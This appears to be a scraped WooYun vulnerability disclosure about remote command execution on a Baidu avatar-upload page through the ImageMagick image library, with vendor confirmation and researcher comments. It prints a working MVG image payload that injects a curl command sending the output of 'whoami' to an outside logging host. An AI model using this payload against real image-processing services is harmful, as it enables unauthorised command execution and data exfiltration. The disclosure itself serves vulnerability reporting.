一张图片引发的血案百度某处命令执行

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0205206

漏洞标题：一张图片引发的血案百度某处命令执行

漏洞作者： CplusHua

提交时间：2016-05-05 10:41

修复时间：2016-06-20 18:00

公开时间：2016-06-20 18:00

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-05-05：细节已通知厂商并且等待厂商处理中
2016-05-06：厂商已经确认，细节仅向厂商公开
2016-05-16：细节向核心白帽子及相关领域专家公开
2016-05-26：细节向普通白帽子公开
2016-06-05：细节向实习白帽子公开
2016-06-20：细节向公众公开

简要描述：

提交到百度SRC结果最后要绑定手机,绑定成功后写得东西都没了,而且百度SRC不支持https访问...... 用户体验太差了.只好提交到这来...

详细说明：

Imagic 执行了命令..

漏洞证明：

更改头像的地方http://www.baidu.com/p/setting/profile/portrait

上传个图片,这里用HawkEye进行数据收集(跟cloudeye是一样的好东西).
图片代码如下:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|curl `whoami`.baidu.a.0.l00.win")'
pop graphic-context
获取数据如下:

如果感觉问题不严重可联系我,深入一下.你懂得.

修复方案：

理论上没有升级的子站点所有能上传图片进行二次渲染的地方调用了这个库就可以执行了.
官方已经出最新版本,可直接升级.

版权声明：转载请注明来源 CplusHua@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：18

确认时间：2016-05-06 17:59

厂商回复：

感谢您关注百度安全！

漏洞评价：

评价

2016-05-05 10:42 | D＆G ( 普通白帽子 | Rank:780 漏洞数:158 | going)

imagemagick?
2016-05-05 11:09 | HackBraid ( 核心白帽子 | Rank:1914 漏洞数:304 | 最近有人冒充该账号行骗，任何自称HackBrai...)

牛逼啊
2016-05-05 11:12 | hkAssassin ( 普通白帽子 | Rank:395 漏洞数:73 | 我是一只毛毛虫。)

估计是Imagemagick
2016-05-05 11:15 | j14n ( 普通白帽子 | Rank:2110 漏洞数:375 | weibo那个j14n不是我。)

中华。。。
2016-05-05 11:25 | 随风的风 ( 普通白帽子 | Rank:257 漏洞数:95 | 微信公众号：233sec 不定期分享各种漏洞思...)

imagemagick的问题？
2016-05-05 11:26 | 开心一下1313 ( 实习白帽子 | Rank:77 漏洞数:27 | 喝口水,压压惊......)

百度主站，，，
2016-05-05 11:27 | D＆G ( 普通白帽子 | Rank:780 漏洞数:158 | going)

@HackBraid 原来你是大V啊
2016-05-05 11:30 | scanf ( 核心白帽子 | Rank:1672 漏洞数:236 | 。)

牛逼
2016-05-05 12:09 | 0hey_boy0 ( 普通白帽子 | Rank:132 漏洞数:23 | balabala~)

Imagemagick
2016-05-05 12:18 | HackBraid ( 核心白帽子 | Rank:1914 漏洞数:304 | 最近有人冒充该账号行骗，任何自称HackBrai...)

@D＆G - -低调低调，好久没聊天了
2016-05-05 12:31 | byr5ec ( 路人 | Rank:10 漏洞数:2 | I'm pursuing all teh time 5h37|_!)

使用这个类库Imagemagick处理图片有哪些应用，wordpress /DZ?
2016-05-05 12:33 | 随风的风 ( 普通白帽子 | Rank:257 漏洞数:95 | 微信公众号：233sec 不定期分享各种漏洞思...)

@byr5ec http://mp.weixin.qq.com/s?__biz=MzA4MDMwMjQ3Mg==&mid=2651864831&idx=1&sn=e987537da27c2e5162d1e1b05e9a40c1&scene=2&srcid=05059Jkm9ETQnlTNxvfMCImC&from=timeline&isappinstalled=0#wechat_redirect 看介里
2016-05-05 12:35 | 荒废的腰子 ( 普通白帽子 | Rank:264 漏洞数:31 | bug is my best friend)

果然imagemagick
2016-05-05 13:34 | byr5ec ( 路人 | Rank:10 漏洞数:2 | I'm pursuing all teh time 5h37|_!)

@随风的风,如果修复的话，还不太好批量找出这个Imagemagick?php扩展默认没有。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0205206

漏洞标题：一张图片引发的血案百度某处命令执行

相关厂商：百度

漏洞作者： CplusHua

提交时间：2016-05-05 10:41

修复时间：2016-06-20 18:00

公开时间：2016-06-20 18:00

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 CplusHua@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0205206

漏洞标题：一张图片引发的血案百度某处命令执行

相关厂商：百度

漏洞作者： CplusHua

提交时间：2016-05-05 10:41

修复时间：2016-06-20 18:00

公开时间：2016-06-20 18:00

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0205206"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 CplusHua@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：